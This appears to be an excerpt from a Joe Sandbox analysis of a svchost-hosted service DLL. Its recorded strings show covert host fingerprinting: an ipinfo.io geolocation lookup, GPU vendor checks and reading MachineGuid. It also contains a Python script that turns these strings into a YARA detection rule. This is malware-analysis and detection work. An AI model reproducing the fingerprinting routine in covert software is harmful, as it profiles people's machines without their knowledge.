            • Instruction ID: 2a7e141e68c1116689a0419be91056af1d6c47e915ccecd4cfb5486c54cbfd3a
            • Opcode Fuzzy Hash: da2ba496f3eb7d9b46214e740186fd5aeb5a1fd6f66b29666b694183b68a7d38
            • Instruction Fuzzy Hash: 74C2A772A1C7C580EB62EB24E4443EE6361EB96794F50D232D69D16ABADF7CD0C4CB04

            Control-flow Graph
            • Graph rendering omitted; the executed/not-executed colouring is not recoverable from the extracted text. Function at 0x7ffa417f0b90 in the svchost module 0x7FFA417C0000. Its basic blocks call 7ffa41887af0, 7ffa417f63e0, 7ffa417f2270, 7ffa417f20c0, 7ffa417f3b90, 7ffa417f4060, 7ffa417f4f20, 7ffa417c53f0, 7ffa417f1a70, 7ffa417f6130, 7ffa417f1f90, 7ffa417efa30, 7ffa417efba0, 7ffa417efae0, 7ffa417f1870, 7ffa41853a0c, 7ffa418518b0 (DName::DName) and 7ffa418518d0, with failure edges into the 7ffa41866d18 (_invalid_parameter_noinfo_noreturn) and 7ffa41853f98 (RtlPcToFileHeader/RaiseException) stubs.
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
            • String ID: value
            • API String ID: 1346393832-494360628
            • Opcode ID: 0816d9e1896b3f9fc9ea7fdf20b84dc6e86ff0960a0f31aeb31d4fe3566e61fe
            • Instruction ID: 4ca1fb156194c934ee6041d529e2165990a4157fb330b9b238857d8226929674
            • Opcode Fuzzy Hash: 0816d9e1896b3f9fc9ea7fdf20b84dc6e86ff0960a0f31aeb31d4fe3566e61fe
            • Instruction Fuzzy Hash: 6B22A162A1CBC144EB13EF35D4403EE6761EB97798F509231EA9D46AEBDF28E180C744

            Control-flow Graph
            • Graph rendering omitted; the executed/not-executed colouring is not recoverable from the extracted text. Function at 0x7ffa417ed720 in the svchost module 0x7FFA417C0000. It calls 7ffa417cacf0 (string construction), then CreateDXGIFactory, then iterates through repeated calls to 7ffa417ca960 (the six vendor-name comparisons behind the AMD/ATI/GeForce/NVIDIA/Radeon strings listed below), allocating through 7ffa418518b0 (DName::DName) and 7ffa418518d0, with failure edges into the 7ffa41866d18 (_invalid_parameter_noinfo_noreturn) stub.
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$CreateFactory
            • String ID: AMD$ATI$GeForce$N/A$NVIDIA$Radeon
            • API String ID: 2331002265-1787989322
            • Opcode ID: bd840fa218cd44ae74466bc3d8f378f9dbd06d9777ed7b2caf557bde4d6c2f33
            • Instruction ID: abfd1ea887f70fc319b3f57bc25bed68b93a751eaef629342da829209175f3f0
            • Opcode Fuzzy Hash: bd840fa218cd44ae74466bc3d8f378f9dbd06d9777ed7b2caf557bde4d6c2f33
            • Instruction Fuzzy Hash: 5DE18572A1C74585EB12DB65E44076D77B5FB85BA4F108322EAAD43AE9DF7CE080CB04
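The two Similarity blocks above for the svchost-hosted module at 0x7FFA417C0000 carry the most hunt-worthy artefacts in this part of the report: the module fetches https://ipinfo.io/json and reads the city, country and region fields (the hardware_manager::download_json_error format string is its own error message), and it enumerates display adapters through CreateDXGIFactory, comparing the adapter description against AMD, ATI, GeForce, NVIDIA and Radeon. Joe Sandbox prints each function's strings as one "String ID" line joined with "$", which is awkward to copy into a rule by hand. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses those String ID lines (the REPORT_BLOCKS text is copied verbatim from the two blocks above), drops fragments too short or too generic to hunt on, and renders a YARA rule. The rule name, the minimum string length and the "3 of" threshold are assumptions chosen for this illustration.

```python
"""Turn Joe Sandbox 'Similarity' String ID lines into a YARA hunt rule.

Added example, not part of the Joe Sandbox report or the analysed sample.
REPORT_BLOCKS is copied from the report's two Similarity blocks for the
svchost module (image base 0x7FFA417C0000); everything else is an assumption.
"""
import re

# Copied verbatim from this report's Similarity sections.
REPORT_BLOCKS = """
• API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$Session$ActiveComputerConcurrency::cancel_current_taskConsoleCreateFactoryFreeInformationMemoryNamePowerQueryStatusSystem
• String ID: )$045012$G$N/A$N/A$N/A$N/A$N/A$city$country$hardware_manager::download_json_error: {}$https://ipinfo.io/json$region$user${}-{}
• API String ID: 1169071619-3347492713
• API ID: _invalid_parameter_noinfo_noreturn$CreateFactory
• String ID: AMD$ATI$GeForce$N/A$NVIDIA$Radeon
• API String ID: 2331002265-1787989322
"""

MIN_LEN = 6  # assumption: shorter fragments such as "city" or "AMD" are too common to hunt on


def parse_string_ids(text):
    """Return every string from every 'String ID:' line, in report order.

    Joe Sandbox joins the strings referenced by one function with '$' and
    sorts them; the '$' is a separator, never part of the string itself.
    'API String ID:' lines are hashes, not strings, and are skipped.
    """
    found = []
    for line in text.splitlines():
        m = re.match(r"\s*•?\s*String ID:\s*(.*)$", line)
        if not m:
            continue
        for s in m.group(1).split("$"):
            if s:
                found.append(s)
    return found


def select_hunt_strings(strings, min_len=MIN_LEN):
    """Keep distinct strings that are long enough and contain a letter.

    'N/A' placeholders, punctuation-only fragments and bare numbers are dropped.
    """
    keep = []
    for s in strings:
        if len(s) < min_len or s == "N/A" or not re.search(r"[A-Za-z]", s):
            continue
        if s not in keep:
            keep.append(s)
    return keep


def yara_escape(s):
    """Escape backslashes and double quotes for a YARA text string."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_yara_rule(strings, name="hardware_profiler_svchost_strings", threshold=3):
    """Render a YARA rule; 'ascii wide' matches both narrow and UTF-16 copies."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        lines.append(f'        $s{i} = "{yara_escape(s)}" ascii wide')
    lines += ["    condition:", f"        {threshold} of ($s*)", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(build_yara_rule(select_hunt_strings(parse_string_ids(REPORT_BLOCKS))))
```

Requiring several of the strings together is deliberate: "country", "region", "NVIDIA" and "Radeon" occur in plenty of benign software, so on their own they would only generate noise, whereas the ipinfo.io URL next to the hardware_manager error string and the GPU vendor list is what ties a hit back to this fingerprinting routine.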

            Control-flow Graph
            • Graph rendering omitted; the executed/not-executed colouring is not recoverable from the extracted text. Function at 0x7ffa4188516c in the svchost module 0x7FFA417C0000, a statically linked CRT low-level file-open routine: it calls 7ffa41884e94 and 7ffa418839dc, opens the path with CreateFileW (retrying once with different flags on failure), checks the handle with GetFileType, records failures through GetLastError and 7ffa418665f8, closes the handle on the error path, and hands the opened handle to 7ffa418838f4, 7ffa418850a8, 7ffa41884c14 and 7ffa41879788; a final CloseHandle/CreateFileW pair reopens the file, with GetLastError and 7ffa41883b1c on failure. Parameter-validation failures go to 7ffa41866644/7ffa41866668.
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
            • String ID: (none)
            • API String ID: 1617910340-0
            • Opcode ID: 1ad9dc9591952d91a480d1a508270e3ff6dc2c1a2e41b9bdce3b2d942a2d5182
            • Instruction ID: 367c8f2e9ec7f1d881156b2c106e4707b4e70d32254dfe40a96d09d695dab648
            • Opcode Fuzzy Hash: 1ad9dc9591952d91a480d1a508270e3ff6dc2c1a2e41b9bdce3b2d942a2d5182
            • Instruction Fuzzy Hash: FBC1C237B28A4186EB12DF68D4812AC3771FB4AB98F109335EA1E977A5DF38E551C700

            Control-flow Graph
            • Graph rendering omitted; the executed/not-executed colouring is not recoverable from the extracted text. Function at 0x7ffa2cef3bc7 in module 0x7FFA2CEF0000: it frees a previous buffer, calls 7ffa2cf14cf0 and _strdup, creates the socket with socket(), sets options with setsockopt, switches the socket to non-blocking with ioctlsocket via 7ffa2cf13980, parses the keepalives_idle, keepalives_interval and tcp_user_timeout connection options with strtol/_errno/isspace (rejecting values through 7ffa2cf02d70 with the 'invalid integer value' message), applies SIO_KEEPALIVE_VALS via 7ffa2cefa920/7ffa2cefafa0, and finally calls connect(), reporting each WSAGetLastError through 7ffa2cf0c450, 7ffa2cf02d70 and 7ffa2cef6990. The error strings listed below ('could not set socket to TCP no delay mode: %s', 'could not set socket to nonblocking mode: %s', 'keepalives parameter must be an integer') are the connection-option messages of PostgreSQL's libpq client library, so this module is a bundled libpq client rather than attacker-written code; the analyst-relevant question is which host it connects to, which this graph does not show.
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: ErrorLast_strdupfreesocket
            • String ID: %s(%s) failed: error code %d$SIO_KEEPALIVE_VALS$WSAIoctl$could not create socket: %s$could not set socket to TCP no delay mode: %s$could not set socket to nonblocking mode: %s$invalid integer value "%s" for connection option "%s"$keepalives parameter must be an integer$keepalives_idle$keepalives_interval$tcp_user_timeout
            • API String ID: 3112834638-675630034
            • Opcode ID: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
            • Instruction ID: e22de063a4e069d6af7e4073c677e0ce0ea59f7a2d0701d6a1f75426bc0e4960
            • Opcode Fuzzy Hash: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
            • Instruction Fuzzy Hash: 77F17F62B08B8282F7518F25D8502F837A0FF46BA4F489135DE4E27695DF7DEA85C720

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
            • String ID: 8`)h$pq)h
            • API String ID: 1031399696-283867673
            • Opcode ID: fa6e045d9bea026bd0bbc77c90f8608cd4fccbe572ecb1a5a30685ecf899a690
            • Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
            • Opcode Fuzzy Hash: fa6e045d9bea026bd0bbc77c90f8608cd4fccbe572ecb1a5a30685ecf899a690
            • Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: _errno$callocfreeisspacelibintl_dgettextmemcpymemsetstrtol
            • String ID: %s/.s.PGSQL.%d$28P01$57P03$Unix-domain socket path "%s" is too long (maximum %d bytes)$could not parse network address "%s": %s$could not translate Unix-domain socket path "%s" to address: %s$could not translate host name "%s" to address: %s$invalid connection state %d, probably indicative of memory corruption$invalid integer value "%s" for connection option "%s"$invalid port number: "%s"$out of memory$port$server is not in hot standby mode$session is not read-only
            • API String ID: 3976168012-2457897468
            • Opcode ID: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
            • Instruction ID: e1682a9b2b754856040ff2509895812d07488e670828b22cf5c0e35b9fb0865f
            • Opcode Fuzzy Hash: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
            • Instruction Fuzzy Hash: D3129D22B08BC686E7118F25D9403F87760FB5ABA8F549231DE4E27696DF3DE685C310

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Close$QueryValue$Concurrency::cancel_current_taskOpen_invalid_parameter_noinfo_noreturn
            • String ID: MachineGuid$N/A$SOFTWARE\Microsoft\Cryptography
            • API String ID: 3643607239-238228221
            • Opcode ID: cbdda606dab6dd788f2b8d026cc23da2296bc16b614af3a288cc8aeaa51c27b2
            • Instruction ID: 5817c7bf608e28e4cc768bf71d23d2997c5e1515c788f0bc3560f6f13c7138d8
            • Opcode Fuzzy Hash: cbdda606dab6dd788f2b8d026cc23da2296bc16b614af3a288cc8aeaa51c27b2
            • Instruction Fuzzy Hash: F7819232F28B4585EB52EB65D444AAD23B0EB4A7A8F508231DA6D13BE5DF3CE4818704

            Control-flow Graph

            APIs
            • LoadLibraryW.KERNELBASE(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418732AD
            • GetLastError.KERNEL32(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418732BF
            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA41873301
            • VirtualProtect.KERNEL32 ref: 00007FFA4187335D
            • VirtualProtect.KERNEL32 ref: 00007FFA4187338E
            • FreeLibrary.KERNEL32(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418733D2
            • GetProcAddressForCaller.KERNELBASE(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418733DE
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Library$LoadProtectVirtual$AddressCallerErrorFreeLastProc
            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
            • API String ID: 983678269-1880043860
            • Opcode ID: ef1a0462dc7e1d20ffb31724c7bbfec7ef991d06205c39f90ae483373132d1d3
            • Instruction ID: 767530c000b968faa7a4c37d883e17b599cbe55e2851a51a35d84c2c7c881a2a
            • Opcode Fuzzy Hash: ef1a0462dc7e1d20ffb31724c7bbfec7ef991d06205c39f90ae483373132d1d3
            • Instruction Fuzzy Hash: 4751BD21B1CB4691EB27BB66A9402792394AF4ABB0F488735DE3D477E0EF3CF4458201

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: curl_easy_setopt$curl_easy_cleanup$_invalid_parameter_noinfo_noreturncurl_easy_initcurl_easy_performcurl_easy_strerror
            • String ID: CURL could not be initialized.
            • API String ID: 2598017873-556012955
            • Opcode ID: ef258deae3e9c7c66bd8f4ce74365bd5f9745c1280b6d6a2ac57bc767532f796
            • Instruction ID: 0b4371f3ac27b406066c0338ec0accba9a7bbbade47749f714fc390e48aa6c34
            • Opcode Fuzzy Hash: ef258deae3e9c7c66bd8f4ce74365bd5f9745c1280b6d6a2ac57bc767532f796
            • Instruction Fuzzy Hash: 6851E962E0C78542EB03AB65A4013796360EF9ABE4F159330EE9D067B7EF6CE1818704

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: malloc$ErrorLastStartupmemset
            • String ID:
            • API String ID: 4264553866-3916222277
            • Opcode ID: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
            • Instruction ID: b3d2c82e594681af9aa1bc9de22aa2a1ecf0765155fef08e2a95c74b51a72310
            • Opcode Fuzzy Hash: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
            • Instruction Fuzzy Hash: C0415071B48BC186F7558F20E8583A923A4FB06B6CF088139CE4D2B3D9DFBD92458320

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: f408d6ea601487ca8bb2a4233b895732b2e3cf47cf663254ea7c56b9dcd8a684
            • Instruction ID: 868b628e45380285719cc99e7b15acc4a1a868070a448a256d2be3839ffcd2ca
            • Opcode Fuzzy Hash: f408d6ea601487ca8bb2a4233b895732b2e3cf47cf663254ea7c56b9dcd8a684
            • Instruction Fuzzy Hash: 1EC1D32A90C68656E763AB1598402BE7BE1EF92B84F59C135EA6D033B1DF7CF845C301

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: !ref_stack.empty()$C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$object separator$ref_stack.back()->is_object()
            • API String ID: 0-2909628094
            • Opcode ID: c6f28a43094067e568919aeebe65e85ed8f6b1c1df78dfaeb86bacc5d7e77b82
            • Instruction ID: a54dfdd23826c46402e826ddbf743d8e86e91ecb93591716a855fd541d504f6d
            • Opcode Fuzzy Hash: c6f28a43094067e568919aeebe65e85ed8f6b1c1df78dfaeb86bacc5d7e77b82
            • Instruction Fuzzy Hash: 26519522A1CA4295EB13FF24D4911EE6371FB82398F808132EA4E875B7DF6CE545C744

            Control-flow Graph

            APIs
            • CreateSemaphoreA.KERNEL32 ref: 64941B20
            • CreateSemaphoreA.KERNEL32 ref: 64941B36
            • InitializeCriticalSection.KERNEL32 ref: 64941B5B
            • InitializeCriticalSection.KERNEL32 ref: 64941B61
            • InitializeCriticalSection.KERNEL32 ref: 64941B67
            • CloseHandle.KERNEL32 ref: 64941B90
            • CloseHandle.KERNEL32 ref: 64941BA5
            Memory Dump Source
            • Source File: 0000002E.00000002.2304875206.0000000064941000.00000020.00000001.01000000.0000001C.sdmp, Offset: 64940000, based on PE: true
            • Associated: 0000002E.00000002.2304680298.0000000064940000.00000002.00000001.01000000.0000001C.sdmp
            • Associated: 0000002E.00000002.2305579458.000000006494A000.00000002.00000001.01000000.0000001C.sdmp
            • Associated: 0000002E.00000002.2306040828.000000006494E000.00000002.00000001.01000000.0000001C.sdmp
            • Associated: 0000002E.00000002.2306329817.0000000064950000.00000004.00000001.01000000.0000001C.sdmp
            • Associated: 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_64940000_svchost.jbxd
            Similarity
            • API ID: CriticalInitializeSection$CloseCreateHandleSemaphore
            • String ID:
            • API String ID: 3487344249-0
            • Opcode ID: 3164d73ad481d2ab7239b497fcccb8682ab96046db25085a8fe4e562c5e92754
            • Instruction ID: 31c3c2f24a53828e468885d33ffcfcee3f6f88692367c2784a926345d8c92843
            • Opcode Fuzzy Hash: 3164d73ad481d2ab7239b497fcccb8682ab96046db25085a8fe4e562c5e92754
            • Instruction Fuzzy Hash: 40219D327016418AFB099F32F9503AA37E5EB45B98F088139CE2D4B398EF38C495C750

            Control-flow Graph

            APIs
            • GetLastError.KERNEL32(?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF02E24
              • Part of subcall function 00007FFA2CF0C3B0: Sleep.KERNEL32(?,?,?,00007FFA2CF02E38,?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF0C3D2
              • Part of subcall function 00007FFA2CF0C3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFA2CF02E38,?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF0C3F0
              • Part of subcall function 00007FFA2CF0C3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFA2CF02E38,?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF0C406
            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF02E4A
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmp
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: CriticalSection$EnterErrorInitializeLastSleepgetenv
            • String ID: /share/locale$PGLOCALEDIR$libpq-16
            • API String ID: 4109591470-900106006
            • Opcode ID: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
            • Instruction ID: 69266db4023c9a827fdd7eabbb873cb54820f5dc281d17bcdd415bb306bc1601
            • Opcode Fuzzy Hash: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
